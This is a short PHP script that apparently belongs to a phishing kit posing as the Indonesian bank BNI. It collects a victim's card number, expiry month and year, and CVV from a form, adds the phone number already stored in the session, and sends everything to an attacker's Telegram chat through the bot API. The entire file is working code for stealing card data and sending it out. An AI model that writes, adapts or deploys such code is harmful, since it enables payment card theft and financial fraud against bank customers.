<?php
include "../telegram.php";
session_start();
$atm = $_POST['atm'];
$bulan = $_POST['bulan'];
$tahun = $_POST['tahun'];
$cvv = $_POST['cvv'];

$_SESSION['atm'] = $atm;
$_SESSION['bulan'] = $bulan;
$_SESSION['tahun'] = $tahun;
$_SESSION['cvv'] = $cvv;
$nohp = $_SESSION['nohp'];
$message = "
✧━━━━━━[ BNI TARIF ]━━━━━━✧
RESS BNI ( ".$nohp." )

• No.Kartu : ".$atm."
• Bulan : ".$bulan."
• Tahun : ".$tahun."
• cvv : ".$cvv."
";

function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot" . $id_bot . "/sendMessage?parse_mode=markdown&chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}

sendMessage($telegram_id, $message, $id_bot);
?>